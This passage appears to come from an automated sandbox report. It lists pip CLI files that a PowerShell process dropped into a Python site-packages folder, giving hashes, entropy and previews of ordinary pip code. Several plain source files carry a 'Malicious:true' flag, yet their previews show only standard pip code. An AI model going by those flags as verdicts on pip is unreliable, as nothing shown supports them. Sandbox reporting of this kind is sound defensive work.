                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):260
                                                                                                                                                                                                                              Entropy (8bit):5.0710434320363165
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:X8aCC/EGWgG+vg18tLgN4i36B0Wlt/8uw52KNdAreKAaMt4R6IaYleHXlll:MaCCMGWD+vhtRi36BvP/8cKNnbyRjaYg
                                                                                                                                                                                                                              MD5:2D9C8610A7A7C829B09FA58ED12FAEFC
                                                                                                                                                                                                                              SHA1:6E5E29550A22694C9B38628B7378EF88D0E015C3
                                                                                                                                                                                                                              SHA-256:6D1F9AA8C4F2EA4FF6B7E25D2EE47BBB06D5E52CCB337950501B468595284D19
                                                                                                                                                                                                                              SHA-512:DF1BFE58254D1634EA32D066707337A02450DB74531EC566221757273AB59EA6E97A848949F045BBD74A56A21A2B54CDF530739D7EBB8657E062CB200FF57EDE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf................................d.Z.y.).zGSubpackage containing all of pip's command line interface related code.N)...__doc__........KC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_internal/cli/__init__.py..<module>r........s..............r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8447
                                                                                                                                                                                                                              Entropy (8bit):5.476507781433221
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:icjpWmd+gECrmyBtDxFaS8PyGTiVaUdyajYEPSV:icjATVWDxkhCXd7z6V
                                                                                                                                                                                                                              MD5:A45B3EADD4EE5F3A1C49C9DA32A7F13C
                                                                                                                                                                                                                              SHA1:B4341301B181B1D30460DB0092BAE419AC78C78B
                                                                                                                                                                                                                              SHA-256:03B004BFB5DE3C5121DCBED684C98CE9BA6016E15947C5F1491E24F60C391EF9
                                                                                                                                                                                                                              SHA-512:32723AAD418BC52C568566E6877B57D4ECFA5B13E562B7765E462884E0041B8068A0DB9B85E529C2076E4374E813CE3465EB2D0E81D561DF34EC3D15993F83CE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf"..............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d...Z.d.e.e.....d.e.d.e.e.....d.e.e.....f.d...Z.d.e.d.e.d.e.e.....f.d...Z.y.).zBLogic that powers autocompletion installed by ``pip completion``.......N)...chain)...Any..Iterable..List..Optional)...create_main_parser)...commands_dict..create_command)...get_default_environment..returnc..........................d.t.........j...................v.r.y.t.........j...................d.....j...........................d.d...}.t.........t.........j...................d.............}...|.|.d.z.......}.t.................}.t.........t.................}.g.}.d.}.|.D.]...}.|.|.v.s...|.}...n...|....j|.d.k(..r.t.........j...................d...........|.j...................d...........x.r...|.d.v.}.|.r.t.................}.|.j...........................}.|.j...................d...........D...c.g.c.]:..}.|.j...................j...................|.........r.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10437
                                                                                                                                                                                                                              Entropy (8bit):5.3142530222390425
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:huXbnnIk7uhT7HYCiyXhz5uKWyaSvCRFiIARkW:huXbnILKyRgyaufdRN
                                                                                                                                                                                                                              MD5:9EDCBD5D97538B1C8C837C3A3A987E7E
                                                                                                                                                                                                                              SHA1:3BDAC9E86BC2716DBF764943A92117BA0849FD6B
                                                                                                                                                                                                                              SHA-256:57E4EF61FAA6C53B554FA4CA52F13236DC4582EABBAA62D0A13DDB15343FF821
                                                                                                                                                                                                                              SHA-512:9CDC7D9F93F29964EBFCCD6F205EB75886BD2971D27E1F586941F8265955E47718D9C48E9CF2D0DB57B3E4810A8A613C5CEE828CEA1975385371283573BC4BE5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf."........................l.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$..d.d.l%m&Z&..d.d.l'm(Z(m)Z)..d.d.l*m+Z+m,Z,..d.d.l-m.Z/..d.d.l-m0Z0m1Z1..d.d.l2m3Z3..d.g.Z4..e.jj..................e6........Z7..G.d...d.e.........Z8y.).z(Base Command class, and related routines.....N)...Values)...Any..Callable..List..Optional..Tuple)...traceback)...cmdoptions)...CommandContextMixIn)...ConfigOptionParser..UpdatingDefaultsHelpFormatter)...ERROR..PREVIOUS_BUILD_DIR_ERROR..UNKNOWN_ERROR..VIRTUALENV_NOT_FOUND)...BadCommand..CommandError..DiagnosticPipError..InstallationError..NetworkConnectionError..PreviousBuildDirError..UninstallationError)...check_path_owner)...BrokenStdoutLoggingError..setup_logging)...get_prog..normalize_path)...TempDirectoryTypeRegistry)...global_tempdir_manager..tempdir_registry)...running_under_vi
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):30356
                                                                                                                                                                                                                              Entropy (8bit):5.770961677146383
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:634SEOD7h0ZjzB0LxlZFiAZ6s3T/56oNAZ:8E9zqLpbr3161
                                                                                                                                                                                                                              MD5:8AA6FF0BD1B9FA6A9AA172E5F3A32759
                                                                                                                                                                                                                              SHA1:1177121C088CC31485C57F6A4B2BEFE0989A3C8A
                                                                                                                                                                                                                              SHA-256:9896978ED9D56CFFEA5D8B8FB61F1ECD7E4DD7502D1F59F11DF855393400DF11
                                                                                                                                                                                                                              SHA-512:1D9B8D37B1D95EA36419E8293C2A90FFEF556C92DB6D42EBFAF88DDAC397B20AE0BF7304DB118A13F24F35792D63CFC2F9133E259E70D868AB2CC236C4C43D1A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vfpu.............................U.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..d.d.l$m%Z%..d.d.l&m'Z'....e.jP..................e)........Z*d.e.d.e.d.e+d.d.f.d...Z,d.e.e+e.f.....d.e.d.e.f.d...Z-..d$d.e.d.e.d.d.f.d...Z/d.e.d.e+d.e+d.e+f.d...Z0d.e.d.e+d.e+d.e+f.d...Z1..G.d...d e.........Z2..e.e.d!d"d#d#d$.%........Z3e.d&e.f.....e4d'<.....e.e.d(d)d*d.d+.,........Z5e.d&e.f.....e4d)<.....e.e.d-d.d*d.d/.,........Z6e.d&e.f.....e4d.<.....e.e.d0d1d2d*d.d3.,........Z7e.d&e.f.....e4d4<.....e.e.d5d6d*d7.%........Z8e.d&e.f.....e4d6<.....e.e.d8d9d:.;........Z9e.d&e.f.....e4d9<.....e.e.d<d=d>d?d.d@.,........Z:e.d&e.f.....e4d><.....e.e.dAdBd*d.dC.,........Z;e.d&e.f.....e4dB<.....e.e.dDdEdFd*dG.%........Z<e.d&e.f.....e4dF<.....e.e.dHdIdJd?d.dK.,........Z=e.d&e.f.....e4dJ<.....e.e.dLdMdNdOdPg.dOdQ.R........Z>e.d&e.f.....e4dM<.....e.e2dS
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1763
                                                                                                                                                                                                                              Entropy (8bit):5.2079740703460535
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:lxUhTa5DmiYvCswGaNfwfdU7qZ27urb290rnv:lxUh06iFswBaMqZ27urbcYv
                                                                                                                                                                                                                              MD5:61722753B559DAC78F3160AED8AEDEF6
                                                                                                                                                                                                                              SHA1:FE828239A67005F8692B5B71BD52B55349C31B21
                                                                                                                                                                                                                              SHA-256:157E6521B036F6A0EA6AC6FDF1329715EA9A7975D3456DABA8C0B97CAFBF43DF
                                                                                                                                                                                                                              SHA-512:41F85683A6D1E01AE7CFA5C054A2A9FF47B3B3C217826924215A294E5BC1E621445916E239412B34E096F987677B49019E4E3A77F31AF3E6DD72946EE4FE766B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................P.....d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.....e.d.d...........Z...G.d...d.........Z.y.)......)...ExitStack..contextmanager)...ContextManager..Generator..TypeVar.._TT)...covariantc.....................R.......e.Z.d.Z.d...f.d...Z.e.d.e.d.....f.d...........Z.d.e.e.....d.e.f.d...Z...x.Z.S.)...CommandContextMixIn..returnc.....................N.......t...........|...............d.|._.........t.................|._.........y.).NF)...super..__init__.._in_main_contextr......_main_context)...self..__class__s.... ..RC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_internal/cli/command_context.pyr....z.CommandContextMixIn.__init__....s .................. %.......&.[..........).NNNc................#.......K.....|.j...................r.J...d.|._...........|.j...................5...d.......d.d.d...........d.|._.........y.#.1.s.w...Y.......x.Y.w.#.d.|._.........w.x.Y.w...w.).NTF).r....r....).r....s.... r......main_contextz CommandContextMixIn.main_context....sW...
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2280
                                                                                                                                                                                                                              Entropy (8bit):5.286938414806333
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:ESvBONo5kw76v26BlhHrJ/Vi/m4UPpQfm/veNiQwKNnNk5dfrEM3W6x6GodJQBCp:EigXTUU5GiQ127jdmaeJUC7BwBi
                                                                                                                                                                                                                              MD5:F7A10BADF834DA65941F0BEA50BA86EC
                                                                                                                                                                                                                              SHA1:AF8B3EA683FE15DDDF8D3DA3A6A741A2FEA43C9C
                                                                                                                                                                                                                              SHA-256:296AD5F1D8B6DF0DD96D65444BD52C820A6FF6B03E1A1975D2F56A693BD060D1
                                                                                                                                                                                                                              SHA-512:EAF2B61B851C51F4D5650BB518B80D595B603B019C9FA5F9402EAC36C2F13EF20DFAE3A3272C904AF02DE0BDA055DA1789E30DF0610FE724646D27CCDD6349D4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf...............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j&..................e.........Z.d.d.e.e.e.........d.e.f.d...Z.y.).z Primary application entrypoint.......N)...List..Optional)...autocomplete)...parse_command)...create_command)...PipError)...deprecation..args..returnc..........................|...t.........j...................d.d...}.t.........j...................d.t.........d.............t.........j.............................t.....................t.........|.........\...}.}...t.........j ..................t.........j"..................d...........t+..........d...v...........}.|.j-..................|.........S.#.t.........$.rn}.t.........j...................j...................d.|...............t.........j...................j...................t.........j.............................t.........j...................d...........Y.d.}.~...d.}.~.w.w.x.Y.w.#.t.........j$....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4887
                                                                                                                                                                                                                              Entropy (8bit):5.299556503911515
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:WfIJ2NFU//oYptlnIfguODSn9KDBIY5PYasKySnx8rQfI+Bej5jI:WFNFE7ns9ODSn9wIY5PYaXxpxBej5jI
                                                                                                                                                                                                                              MD5:D017A7D6CC15B1D6A6C6BDFC97C3088C
                                                                                                                                                                                                                              SHA1:3ABC9B5C501AB35A5DCD38E4253FFACE117FE382
                                                                                                                                                                                                                              SHA-256:150DE4233859B7C109FF1E8A7BA5F7072F4C373A2EF2D47FE549F7CD3B5F55AA
                                                                                                                                                                                                                              SHA-512:A0D8E9D7597C01EAF9D54C7A6523992057F018EEFFF8425713FB09F9907BC4C0E92C39BEC81DDEA4FAACB99D08C5F52057B3E3FB98144DA6FA92D00131CEF23C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf................................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.g.Z.d.e.f.d...Z.d.e.d.e.e.....f.d...Z.d.e.e.....d.e.e.e.e.....f.....f.d...Z.y.).z=A single place for constructing and exposing the main parser......N)...List..Optional..Tuple)...get_runnable_pip)...cmdoptions)...ConfigOptionParser..UpdatingDefaultsHelpFormatter)...commands_dict..get_similar_commands)...CommandError)...get_pip_version..get_prog..create_main_parser..parse_command..returnc..........................t.........d.d.t.................d.t...........................}.|.j.............................t.................|._.........t.........j...................t.........j...................|.........}.|.j...................|...........d.|._.........d.g.t.........j...........................D.....c.g.c.]...\...}.}.|.d...d.|.j.............................c.}.}.z...}.d.j...................|.........|._.....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):15004
                                                                                                                                                                                                                              Entropy (8bit):5.342040027935636
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:oJHRoNOEcrbHGU9lFK2Lq5VWrZkOIlIoWJZmaSz:oDoYEcrbmsFXcVWrZkFI7JOz
                                                                                                                                                                                                                              MD5:E2809C1622160BFAF30FD873B39ADEB0
                                                                                                                                                                                                                              SHA1:A843054D21C7C607A026479E17B32A583E5FBC77
                                                                                                                                                                                                                              SHA-256:17487BBFA28D1D6FAB64CE667AD63F6A5EF30684EF8823236C00BDB1B55069DB
                                                                                                                                                                                                                              SHA-512:5C1F70CCA5AEC29C3E175E54A0F296D55752C5EC7C68BC401EC8675A9D00ED478C6815E8B3468526A9FA2077C2437E18D6AF89462F63A9D61EA7631BB74C9221
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf.*........................(.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.....e.j,..................e.........Z...G.d...d.e.j2..........................Z...G.d...d.e.........Z...G.d...d.e.j8..........................Z...G.d...d.e.........Z.y.).z.Base option parser setup.....N)...suppress)...Any..Dict..Generator..List..Tuple)...UNKNOWN_ERROR)...Configuration..ConfigurationError)...redact_auth_from_url..strtoboolc.............................e.Z.d.Z.d.Z.d.e.d.e.d.d.f...f.d...Z.d.e.j...................d.e.f.d...Z...d.d.e.j...................d.e.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.d.e.f.d...Z...x.Z.S.)...PrettyHelpFormatterz4A prettier/less verbose help formatter for optparse...args..kwargs..returnNc.....................r.......d.|.d.<...d.|.d.<...t.........j...........................d.....d.z...|.d.<...t...........|.....|.i.|.......y.).N.....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2602
                                                                                                                                                                                                                              Entropy (8bit):5.577324988383973
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:fXicSHcvcJEBXLJnorZteSLPceXNeX9X6XM9tuT0Oe1aM7KlA9UO6cJ4f:fXbSH28EFWZteoNi9X6XMPSLe2G96Y4f
                                                                                                                                                                                                                              MD5:13D2AA585C8EB08F2D9F7C94AEA3B0B2
                                                                                                                                                                                                                              SHA1:D1E083F862CF697636BC13CA9CBF68685BDCE6F4
                                                                                                                                                                                                                              SHA-256:9A148B11303E7C0C7E98D12AB142F497F3A2033B01EC560D58F0E9F4FAD80289
                                                                                                                                                                                                                              SHA-512:30C3CACB6FB3B924273C40E406DFF0B07EAA9C6881AFDD9AE5F69CEA61B97FBA7A32837354ED3602CBE295519C12D2E1CED3D10D98DF2C39C324398AF770EFAA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf................................d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...e.e.e.....g.e.e.....f.....Z.d.e.e.....d.e.d.e.d.e.e.d.d.f.....f.d...Z.d.d...d.e.d.e.e.....d.e.f.d...Z.y.)......N)...Callable..Generator..Iterable..Iterator..Optional..Tuple)...BarColumn..DownloadColumn..FileSizeColumn..Progress..ProgressColumn..SpinnerColumn..TextColumn..TimeElapsedColumn..TimeRemainingColumn..TransferSpeedColumn)...get_indentation..iterable..bar_type..size..returnc................#........K.....|.d.k(..s.J.d...........|.s?t.........d.........}.t.........d.........t.........d.d...........t.................t.................t.................f.}.n<|.}.t.........d.........t.................t.................t.................t.........d.........t.................f.}.t.........|.d.d.i...}.|.j...................d.t.................d.z...z...|...........}.|.5...|.D.]"..}.|.......|.j...................|.t.........|...................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):18834
                                                                                                                                                                                                                              Entropy (8bit):5.502278681384077
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:gGmfLWJFtmyuwQ64nkPqgtDrKSQ/gLD4xUElbpE:FmfLmLmZFVnkPqsrKSZgU
                                                                                                                                                                                                                              MD5:0BEC098F12EB6CB07D18BDAFC8E06694
                                                                                                                                                                                                                              SHA1:28FCDB41EE9514B1D353BE95F0A7513AB702539A
                                                                                                                                                                                                                              SHA-256:58B871D3CD42994C1D5D9E6030FCEE00FDC868690881B496C4C297011B628985
                                                                                                                                                                                                                              SHA-512:19E6DA17A7523A1956E4CA4E5EBC16A5108995AC66BD5ED1799EF71314D82F475A0CE0CE027AB24A465AC21561059E093AE3AB582B56DAE3BC17C40D6E2F765B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf.G........................8.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l!m"Z"..d.d.l#m$Z$..d.d.l%m&Z&..d.d.l'm(Z(m)Z)m*Z*m+Z+..d.d.l,m-Z-..d.d.l.m/Z/..d.d.l0m1Z1..d.d.l2m3Z3..d.d.l4m5Z5m6Z6m7Z7..d.d.l8m9Z9..e.r.d.d.l:m;Z;....e.jx..................e=........Z>d.e.d.....f.d...Z?..G.d...d.e.........Z@..G.d...d e.e@........ZAe7j...................e7j...................e7j...................g.ZEd&d!..ZFd"e.d.e.f.d#..ZG..G.d$..d%eA........ZHy.)'a....Contains the Command base classes that depend on PipSession...The classes in this module are in a separate module so the commands not.needing download / PackageFinder capability don't unnecessarily import the.PackageFinder machinery and all its vendored dependencies, etc.......N)...partial)...Values)...TYPE_CHECKING..Any..List..Optional..Tuple)...WheelCache)...cmdoptions)...Comman
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7822
                                                                                                                                                                                                                              Entropy (8bit):4.794274731365966
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:EsPpXlRr6H+jlckRpvy5Xluj0hPl2+xxaHXTYUBpzM7bVTt3kS9Xn:EsPpXfjlxv4rxasT7bVBnXn
                                                                                                                                                                                                                              MD5:AC5AA1470CD4817021749A4F2C8633E0
                                                                                                                                                                                                                              SHA1:C7A4F03D88D249AF032DEC971E86ABFDEBC30C33
                                                                                                                                                                                                                              SHA-256:8F0D06DC65FAFE5E4DB2C7D89726785C2504222722D36C2F89030AD6B3A02390
                                                                                                                                                                                                                              SHA-512:4AA42151F0A04BCFEFAE15283D7270F7476F702C14A500EEE3E274170F37C6CE6C0B072D6C2E54C71E8704071B28BCA9423ADC1BC539038667C4A25734937301
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................L.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j...................e.........Z...G.d...d.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.........Z.e.j(..................d.e.d.e.e.d.d.f.....f.d...........Z.d.Z.d.Z.e.j(..................d.e.e.....d.e.d.....f.d...........Z.y.)......N)...IO..Generator..Optional)...WINDOWS)...get_indentationc.....................$.....e.Z.d.Z.d.d...Z.d.e.d.d.f.d...Z.y.)...SpinnerInterface..returnNc...........................t.....................N....NotImplementedError....selfs.... .KC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_internal/cli/spinners.py..spinz.SpinnerInterface.spin.............!..#..#.......final_statusc...........................t...................r....r......r....r....s.... r......finishz.SpinnerInterface.finish....r....r......r....N)...__name__..__module__..__qualname__r......strr......r....r....r....r........s..........$....$.3..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):357
                                                                                                                                                                                                                              Entropy (8bit):5.573643602639622
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:c/aDJSsTfgVMiMP/alySLVmiQIBGZbw52KNdAreKAaMNR4B2aOt7PiTQvc+n:8aDJSsCTlySQkGZLKNnbtRw2aOt7q8c+
                                                                                                                                                                                                                              MD5:E6A74C7C69DEC732B3E9C2C794ECF149
                                                                                                                                                                                                                              SHA1:C33D446B2A0C5882A6397C645C30896071FB7CBA
                                                                                                                                                                                                                              SHA-256:D2024701EA1C1E8B25D169CB11DC92C05DFFD7D9153E0E16B33B8F0476F30921
                                                                                                                                                                                                                              SHA-512:B95B022B9EAA5E8D91E19BE1134C52ACD3BE0AF1844DD4D613A7850653EC23B286959F7E46E76F887CD689D7ECF9A7438D7C5E9B453C5552BD337114075BB532
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vft...............................d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.y.)...............................N)...SUCCESS..ERROR..UNKNOWN_ERROR..VIRTUALENV_NOT_FOUND..PREVIOUS_BUILD_DIR_ERROR..NO_MATCHES_FOUND........OC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_internal/cli/status_codes.py..<module>r........s&.........................................r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6690
                                                                                                                                                                                                                              Entropy (8bit):4.450934596093146
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:sVBCQwr38hi0cFp+HJmLobH2p0FInd96SwwWRXt:KBCbaiplkXWd9JHWRXt
                                                                                                                                                                                                                              MD5:A5D85E06170EC3A2C84F30D58405C5AE
                                                                                                                                                                                                                              SHA1:BF455745984788587539059B746F930B46DB0B1D
                                                                                                                                                                                                                              SHA-256:FDBAFFE4D812C52BAF3E3305D0C2C7CD2E6CE81A529100101CAACB2BCF556AE3
                                                                                                                                                                                                                              SHA-512:91DEF910A4EB9720A4710E7C0AD24EB0FAE5A9F4CD04F810EBC6D1339B42CEADE53D0A00DB24CD214994CDE5869EBBA20F36C9ACD01735AD1D86C3D0A95830FE
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:"""Logic that powers autocompletion installed by ``pip completion``.."""..import optparse.import os.import sys.from itertools import chain.from typing import Any, Iterable, List, Optional..from pip._internal.cli.main_parser import create_main_parser.from pip._internal.commands import commands_dict, create_command.from pip._internal.metadata import get_default_environment...def autocomplete() -> None:. """Entry Point for completion of main and subcommand options.""". # Don't complete if user hasn't sourced bash_completion file.. if "PIP_AUTO_COMPLETE" not in os.environ:. return. cwords = os.environ["COMP_WORDS"].split()[1:]. cword = int(os.environ["COMP_CWORD"]). try:. current = cwords[cword - 1]. except IndexError:. current = "".. parser = create_main_parser(). subcommands = list(commands_dict). options = [].. # subcommand. subcommand_name: Optional[str] = None. for word in cwords:. if word in subcommands:. s
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8733
                                                                                                                                                                                                                              Entropy (8bit):4.421935775681879
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:3xO2h/m1ma5bDZF3AKihdCO36OLOUOC1ngY/+/YLexG7Ts7dtYUeDlTv+eWPA12y:hOtmavqKihR1gC+/YCG0LYn5WnIlBV
                                                                                                                                                                                                                              MD5:60EFD5BD0CE796DFDE1CE7052D08974E
                                                                                                                                                                                                                              SHA1:2F96CC02F951BFC4E991337EEFCBC9064C4F3687
                                                                                                                                                                                                                              SHA-256:8AE55619ADA84EAEE00517A8D1EAF7674B57276A2A0480BA4230C77270E12976
                                                                                                                                                                                                                              SHA-512:41B5B558DA4653267CC81C6302C6EC6F33D62D2716CC534863B40676208D6F0527CE3E347FB144BF3FDE078478FFD676A50C39B259D3445F3466F675B0BD22AF
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:"""Base Command class, and related routines"""..import functools.import logging.import logging.config.import optparse.import os.import sys.import traceback.from optparse import Values.from typing import Any, Callable, List, Optional, Tuple..from pip._vendor.rich import traceback as rich_traceback..from pip._internal.cli import cmdoptions.from pip._internal.cli.command_context import CommandContextMixIn.from pip._internal.cli.parser import ConfigOptionParser, UpdatingDefaultsHelpFormatter.from pip._internal.cli.status_codes import (. ERROR,. PREVIOUS_BUILD_DIR_ERROR,. UNKNOWN_ERROR,. VIRTUALENV_NOT_FOUND,.).from pip._internal.exceptions import (. BadCommand,. CommandError,. DiagnosticPipError,. InstallationError,. NetworkConnectionError,. PreviousBuildDirError,. UninstallationError,.).from pip._internal.utils.filesystem import check_path_owner.from pip._internal.utils.logging import BrokenStdoutLoggingError, setup_logging.from pip._internal.utils.misc im
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):30064
                                                                                                                                                                                                                              Entropy (8bit):4.687842673229263
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:Db9NdDwC9ZddM2pE/fALZbp/cBOM4G9ZsrNHJ5L9geSvl/piSg2JLIaHqxpfToGv:DblDwQdG2pAgpEBh4GHyst0SIWqf37
                                                                                                                                                                                                                              MD5:C14FF02959CDDF0F58CFA28806E406AC
                                                                                                                                                                                                                              SHA1:31D33FF8F2720ABEFC04FC4B28364B007CC8BB8E
                                                                                                                                                                                                                              SHA-256:D44226F32322C503042CEE10CE881D2285A4BC8950AA5016D189CF78E9A7BC40
                                                                                                                                                                                                                              SHA-512:2F9906878659E4A6171C9BDBF59892CB37EDE1FDE1E1EBE2CFF886F8AF0B826F8E84215A4C4F68BA725F060045595C90501BD3CB5C54F656E55F26AAFEF4AD65
                                                                                                                                                                                                                              Malicious:true
